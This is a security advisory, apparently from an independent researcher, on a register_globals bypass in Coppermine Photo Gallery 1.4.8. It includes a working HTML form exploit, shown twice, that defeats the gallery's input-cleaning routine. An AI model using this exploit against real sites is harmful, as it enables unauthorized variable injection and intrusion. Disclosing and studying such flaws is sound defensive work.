——————-Summary—————-
Software: CPG Coppermine Photo Gallery
Sowtware’s Web Site: http://coppermine.sourceforge.net/
Versions: 1.4.8.stable
Class: Remote
Status: Unpatched
Exploit: Available
Discovered by: imei addmimistrator
Risk Level: High
—————–Description—————
Coppermine Photo Gallery has a logical design fault that will result to bypassing anti-XSS-Injection–RegGlobal-System.
It is because that process of cleaning user suplied data checks that if we have any varable
that exists in querystrings(or same)? If so it deletes that varable.Cause of this approach we can delete predefined varables(e.g _GET&_POST) that has defined arbitary varables before that it delete, and cleanup system will bypass with this trick.
Imagine that Register globals is on. you request a url with this parameters in Mixed Get and Post Request:
<form method=post action=”cpg/?MyVar=value”>
<input name=_GET type=hidden>
<input name=_REQUEST type=hidden>
<input type=submit></form>
It will append MyVar as a varable with arbitarry value before php scripts handles process{cause of register globals} and after that it give handle, predefined _GET&_REQUEST varables will delete. So our varable is unaccessable for checking and deleting but it exists in global area.
Don’t forget that if you like to post some other standard parameters to program, you sould not use get after here.But e.g. use post. I mean that you inject your parameter with get array and pass standard parameters (e.g. pic number or page number) with post or so… BTW you sould just one of this arrays in one time.
Cause of this bug you can create your own parameters that will attend after on source code.
————–See Also——————
{include/init.inc.php}40-101
/*cause of extra size of code I dont include them here*/
————–Exploit———————-
<form method=post action=”cpg/?MyVar=value”>
<input name=_GET type=hidden>
<input name=_REQUEST type=hidden>
<input type=submit></form>
————–Conditions————–
Register Globals Should Be ON
————–Credit———————–
Discovered by: imei addmimistrator
addmimistrator(4}gmail(O}com
imei(4}Kapda(O}IR
www.myimei.com
myimei.com/security